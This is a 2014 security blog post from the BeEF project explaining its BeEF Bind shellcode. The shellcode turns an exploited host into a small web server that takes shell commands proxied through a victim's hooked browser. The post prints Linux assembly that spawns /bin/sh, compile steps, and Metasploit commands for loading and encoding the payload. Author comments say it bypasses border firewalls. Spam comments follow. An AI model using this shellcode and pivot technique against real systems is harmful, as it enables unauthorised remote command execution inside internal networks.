Wednesday, March 19, 2014

Exploiting with BeEF Bind shellcode

Today's post contributed by Bart Leppens.

Some time ago Michele blogged about the BeEF bind shellcode that Ty Miller wrote for the BeEF project.  In the meantime we have committed the full source of this shellcode to the BeEF repository and it has been ported to  Linux x86 and x64 as well. So, next time you find an exploitable overflow in an application, why not give BeEF Bind a try?
In contrast to the "classical" bind or reverse shell-shellcodes, BeEF bind makes use of Inter-Protocol Communication.  This way it can be used in a very subtle way to pivot into a company's internal network by abusing a victim's hooked browser.  To achieve this, our shellcode is in fact a small webserver that proxies all the commands back and forth between cmd.exe and the victim's browser.  For making it more effective the CORS-header "Access-Control-Allow-Origin: *" has been added.  This means that, when we make cross-domain AJAX calls towards it, we are able to read the response of the HTTP request without violating the Same Origin Policy.

Exploit flow

The BeEF Bind shellcode exists of 2 parts: the Stager and the Stage. The Stager is a smaller piece of shellcode that allocates one page of executable memory and initializes a websocket that waits for a client connection before sending the actual payload: the Stage.

Once the client sends the data, the shell code scanning for the request gets processed. The Stager locates the Stage by searching for the string cmd= in memory, checking if the EBX register value points to it:

cmp dword [esi], 0x3d646d63  ;=dmc

The string indicates the start of the bytecode of the actual Stage.  The Stager copies this bytecode to the allocated executable memory and then jumps into it.

The Stage initializes a server socket, as well.

Sets of OS pipes are created to redirect the input and output through cmd.exe (Windows) or /bin/sh (Linux). These pipes are used to pass and subsequently execute OS commands.

On Windows the Windows API CreateProcess is being called to execute the command. On Linux this is done with the setresuid and execve syscalls.

xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0xa4 ;sys_setresuid16
int 0x80 
;execve("/bin//sh", 0, 0)
xor eax, eax
push eax
push eax
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp
push BYTE 0x0b ;sys_execvepop eax
int 0x80

So, when the client sends a request to the server socket, the shellcode once again scans for the string cmd=.  Everything after this string is sent to cmd.exe till we meet a CR/LF.  Then, the result of the executed command is send back to the client.

BeEF bind established
In our BeEF codebase, the shellcode is located in the folder modules/exploits/beefbind/shellcode_sources.

Both linux and windows directories contain commented assembly-code of the shellcode as well as a small C-file "socket.c". With these small files a standalone version (for test or RCE) can be compiled with MinGW (Windows) or with GCC:

c:\MinGW\bin>gcc -o beefstager.exe beefstager.c

and then executed with:

c:\MinGW\bin>beefstager.exe 1234

or just with the default port 4444:


The msf directory contains the modules and the instructions (instructions.txt) on how you can use BeEF bind with the metaspoit framework. This comes in handy for re-encoding the shellcode for AV-evasion or just for coding out bad characters like the NULL-byte.

copy beef_bind-handler.rb %METASPLOIT_PATH%/lib/msf/core/handler/beef_bind.rb
copy beef_bind-stage-windows-x86.rb %METASPLOIT_PATH%/modules/payloads/stages/windows/beef_shell.rb
copy beef_bind-stager-windows-x86.rb %METASPLOIT_PATH%/modules/payloads/stagers/windows/beef_bind.rb
copy beef_bind-stage-linux-x86.rb %METASPLOIT_PATH%/modules/payloads/stages/linux/x86/beef_shell.rb
copy beef_bind-stager-linux-x86.rb %METASPLOIT_PATH%/modules/payloads/stagers/linux/x86/beef_bind.rb
copy beef_bind-stage-linux-x64.rb %METASPLOIT_PATH%/modules/payloads/stages/linux/x64/beef_shell.rb
copy beef_bind-stager-linux-x64.rb %METASPLOIT_PATH%/modules/payloads/stagers/linux/x64/beef_bind.rb

Check it works:
msfpayload -l | grep beef_bind

Get info on the payload:
msfpayload windows/beef_shell/beef_bind S

Dump stager and stage in C format:
msfpayload windows/beef_shell/beef_bind C

Dump stager in raw format:
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager

Encode stager to remove nulls:
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'

If you are interested in more information about attacking internal networks via the browser or about BeEF internals, Chapter 10 of "The Browser Hackers Handbook" discusses "Attacking Networks" and covers more of this kind of topic.

If you know of other good resources for browser hacking, or other BeEFy stuff, we would love to hear about them!

Bart Leppens has a master degree in Informatics. He has over 10 years of experience in IT, mainly in software development. He reported security bugs in widely used products from major vendors. At the moment, he is working as a Project Manager for the Belgian government at the department of Finances. During his spare time he likes to contribute to the BeEF-project. You can reach him via twitter: @bmantra


  1. Very nice! This looks like a great step forward. Do you guys plan to have a reverse shell proxy back through the hooked machine as well? You guys know more about this than I do, but it would appear that reverse shells are favoured over bind shells thanks to firewalls and the like. I'd love to see an implementation of this which connects back.

    Another admittedly picky note, encoding payloads is only about bad char avoidance, and not about AV evasion at all. If anything, encoding makes the payload look _more_ suspicious :) Dave Maloney presented a great talk at DerbyCon last year that talks about this, it can be found here:

    Keep up the great work! Cheers :)

    1. Hey OJ.

      That is exactly what BeEF Bind does. The browser delivers the exploit. The shellcode then sets up a mini-web server to accept OS commands from the hooked web browser. The output is then tunnelled back through the browser to the attacker on the Internet, which basically bypasses any border security controls to allow remote access to internal systems and shells.


  2. Happy you like it OJ!

    This can be even better than a traditional bind shell and even more likely than a reverse shell to provide you access out of the network. Also, you don’t even have to compromise the machine the browser is running on. Remember the browser already has a connection to a server you control and it can connect to the target. Once the target has been compromised (via Inter-protocol Exploitation) and the BeEF Bind is running, BeEF will simply use the browser to proxy communication between you and the target over HTTP/S.

    Why is this better than a traditional bind shell and reverse shell? Obviously, a bind shell needs the firewall rules to allow an incoming connection to your target. A reverse shell also needs supportive egress firewall rules. It needs to allow connections from the target to the server you control on the Internet. However, the BeEF Bind needs neither. It needs a browser to do what browsers do – send HTTP requests.

    FYI Aviator prevents this out of the box.

  3. Loved to read your blog. I would like to suggest you that traffic show most people read blogs on Mondays. So it should encourage blogger to write new write ups over the weekend primarily.Great post! Interesting information and cute writing style.writing a resume that stands out from the crowd is a key success factor for job seekers. An eye-catching professional resume will increase your chances of getting a job interview.Choose best resume writing service for your better future.

  4. Operations Management Assignment
    Great Information,it has lot for stuff which is informative.I will share the post with my friends.

    1. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging. If anyone wants to become a Java developer learn from Java Training in Chennai. or learn thru Java Online Training India . Nowadays Java has tons of job opportunities on various vertical industry.

  5. well Thanks a lot for such a wonderful post, the stuff posted were really interesting and useful. The quality of the content was good and clear.
    Sociology Assignment Help

  6. This site and the resources you provide is really nice keep it up.
    Assignment Writing Service United Kingdom

  7. From your blog, I can learn some new knowledge, I like the valuable information you provide in your articles.
    Statistics Assignment Help

  8. HR homework Help
    by visiting this site I found cool stuff here keep it up.

  9. You have explained the different aspects of BeEF blind shell code in a convincing manner and it is truly helpful for those who need to know about BeEF project.
    Essay writing service

  10. Here are some useful updates about BeEF blind shell code. It will help people who need to know about the BeEF blind shell code.
    Custom essay writing service

  11. I think he's got the point. Me too on the other hand using the same method with my work at

  12. Finally I found a great post with interesting topic. I read every points of this post that is really so enjoyable and I have bookmark your site for get back again here.
    1 Yonge St

  13. I want to to thank you for ones time due to this fantastic read! Always has really good posts and topics please keep it up.

  14. Hey there I feel so fortunate to come over your blog you express it in a very easiest way I am very much active person over your blog pretty good to read your blog its quit interesting to read your blog always because it looks fresh all the time.
    M City Condos

  15. very Informative Post, would love to read more, keep writing. I would like share some links, useful to students
    Coursework writing service

  16. Your blog is very informative and great. Its very great read for me because your writing skills is so good and you will write this post in very good manner. Thanks!
    Coursework writing service

  17. Well I would like to congratulate to you amazing writing skills as a regular member of your blog I wanted to say this, it’s really informative blog good work!
    SEO Company Jacksonville

  18. Hello friend, your all blog is very useful for everyone, I really like your all post. Thanks for sharing your experience with us and this type of information. I hope you will continue to this sharing with us.

    Get Ayurvedic Medicine For Kidney in India

  19. I appreciate it!. I really like it when people get together and share ideas. Great website, continue the good work!. Either way, great web and I look forward to seeing it grow over time. Thank you so much.
    super smash flash 2
    bloons tower defense 5

  20. Awesome Work, I like the helpful info you provide in your articles, you touched some nice factors here and you have a genuine capacity for composing extraordinary
    Stuff. It is a perfect work and it's really inspiring and full fill with knowledge.

  21. Thank you a lot for providing individuals with a very spectacular possibility to read critical reviews from this site.

    Android Training in Bangalore

  22. The article you have shared here very good. This is really interesting information for me. Thanks for sharing! login |hotmail log out |gmail login

  23. I like the post format as you create user engagement in the complete article. It seems round up of all published posts. Thanks for gauging the informative posts.
    cara menggugurkan kandungan

  24. Shorouk Shorouk for all household services from Cleaning of apartments, cleaning apartments, insect control and sewerage, offering you all the domestic services at the cheapest prices. Contact us to request the service you want Dear customer
    شركة تنظيف بخميس مشيط
    شركة مكافحة حشرات بخميس مشيط
    شركة تنظيف مجالس بخميس مشيط

    شركة تنظيف خزانات بالاحساء
    شركة تنظيف خزانات بابها
    افضل شركة تنظيف خزانات بالاحساء

  25. How to use the beef framework to hack a browser across the network? I got an article on the internet but its on infection the browser inside the network

  26. Your blog is great. I read a lot of interesting things from it. Thank you very much for sharing. Hope you will update more news in the future.

  27. how execute powershell script with beef in hookup browser any idea?

  28. Record of loan repayment has turned into a factor in deciding a man's advance endorsement. car title loans chicago

  29. Nice tutorial. Thanks for sharing the valuable information. it’s really helpful. Who want to learn this blog most helpful. Keep sharing on updated tutorials…

    java training in chennai | java training in bangalore

    java online training | java training in pune

    selenium training in chennai

    selenium training in bangalore

  30. Hello! This is my first visit to your blog! We are a team of volunteers and starting a new initiative in a community in the same niche. Your blog provided us useful information to work on. You have done an outstanding job.
    Best AWS Training in Chennai | Amazon Web Services Training in Chennai

    AWS Training in Bangalore | Amazon Web Services Training in Bangalore

    Amazon Web Services Training in Pune | Best AWS Training in Pune

  31. I found your blog while searching for the updates, I am happy to be here. Very useful content and also easily understandable providing.. Believe me I did wrote an post about tutorials for beginners with reference of your blog.
    Selenium Training in Bangalore | Selenium Training in Bangalore | Selenium Training in Bangalore | Selenium Training in Bangalore

  32. I wanted to thank you for this great read!! I definitely enjoying every little bit of it I have you bookmarked to check out new stuff you article.
    python training in chennai
    python training in Bangalore
    Python training institute in chennai

  33. Great post! I am actually getting ready to across this information, It’s very helpful for this blog.Also great with all of the valuable information you have Keep up the good work you are doing well.
    Devops Training in pune

  34. Wow it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot. it is really explainable very well and i got more information from your blog.

    rpa interview questions and answers
    automation anywhere interview questions and answers
    blueprism interview questions and answers
    uipath interview questions and answers
    rpa training in chennai

  35. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  36. We are a reputable writing company of international experience with creation of different types of essays for students of all levels of education. We have a team of professional writers of all possible scientific areas. That is why our agency is always confident about our essays being of the top quality. The assignments we provide for our customers always contain relevant information and facts.

    Due to a number of factors, the mental medicine is nowadays one of extremely popular scientific directions as long as scientists from all over the world explore the reasons for psychological problems, mental illness argumentative essay topics, and the ways to overcome and treat them. People’s psychological peculiarities, behavior, and reactions to various factors and circumstances are under discussion and are carefully examined.

  37. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Dot net training in electronic city

  38. Blog Commenting: An unmatched and nonpareil post i have ever seen. The content is so appealing that it has created an impulse to avail Assignment Help Singapore services.

  39. I’ve had this panel saw for about 2 years, after several years and I can say with certainty that the Sawtrax is the better panel saw. It’s a little more powerful than other one – not enough to matter in everyday woodshop use, but the power difference is noticeable that panel saw can easily cut thick hardwood. And now I realized that about reliability good product best value for money go for it…… Panel Saw

  40. Resources like the one you mentioned here will be very useful to me ! I will post to this page on my blog. I am sure my visitors will find that very useful

    href="" rel="nofollow"SEO Training in Bangalore
    href="" rel="nofollow"Best Training in Bangalore

  41. Great product. Great customer service. You should be putting every other printing company out of business.You are top of my list for printing. Excellent service, excellent personnel High quality work,Highly recommended for everyone in the business.
    Ameri Technology

  42. Ohhh man this Color Copier-MFP is awesome.It Seems too good to be true. It is an incredible hassle-free product. I never thought I could love a printer lol.As a small business owner, this thing pays for itself in both time and money. I originally bought this for shipping labels, but within a few minutes I started printing logo stickers to slap on the packages as well.I have already and will definitely continue to recommend your services to others in the future.
    Ameri Technology


  43. Thank you for a wonderful job and for the results we were looking for!I would totally recommend them!Truly a wonderful way to boost your homes curb appeal without breaking the bank."House looks really beautifull.
    <a href=">Zap Cleaning</a>

  44. Angular framework is supported by google team. for creating responsive web design learn,

    angularjs training in chennai

  45. Was looking for Angular Training in Bangalore and came across this. Hence sharing:

  46. Hello, I read your blog occasionally, and I own a similar one, and I was just wondering if you get a lot of spam remarks? If so how do you stop it, any plugin or anything you can advise? I get so much lately it’s driving me insane, so any assistance is very much appreciated.
    Android Training in Chennai
    Selenium Training in Chennai
    Devops Training in Chennai

  47. Thank you for taking time to provide us some of the useful and exclusive information with us.
    selenium course in chennai

  48. Hey Nice Blog!! Thanks For Sharing!!!Wonderful blog & good post.Its really helpful for me, waiting for a more new post. Keep Blogging!
    SEO company in coimbatore
    SEO company
    web design in coimbatore

  49. hello there i was hired american electric company for fixing some wires i had feel good experience with their electrician and i would like to recommended to everyone who need an electrician company Whether you need an electrician to come and fix electrical work at affordable price. American Electric

  50. Get the best essay writing service by profound writers of MyAssignmenthelpAu at pocket friendly price. We are available 24*7 to assist you in every possible way. For further details on academic assessment email us at cs@Myassignmenthelpau.Com or Phone Number: +61-2-8005-8227.

  51. Superb work you well done on this blog, I am deeply read your blog I got of many information on this, keep sharing like this type of blog, I hope you will be create soon this type of blog and valuable information, I am waiting for your new blog, I hope I will be see you soon, thank you so much for read my comment, I am suggest to you all comment reader please read this blog he will be mention lot of information on this please go and read it, If any one searching Top 5 Website Development Company in delhi in cheap rate please go on my website, we are do for you any think.
    Top 5 Website Development Company in Delhi

  52. I like to read your article, I got a many useful information on this blog, I think you will be share with us like this type of article, keep share more like this type of topic am happy to see your blog post, thank you so much for share this useful information with us, If any one grow up looks and life style please come on my website.
    Lifestyle Magazine India

  53. Spring Boot has been a key player in the Spring ecosystem. This project makes our life much easier with its auto-configuration ability.

    spring boot interview questions

  54. Nice Information , Thank you so much for taking a time to post this blog

    SAP Training in Bangalore

  55. I have read your blog its very attractive and impressive. I like it your blog.
    Data Science training in Bangalore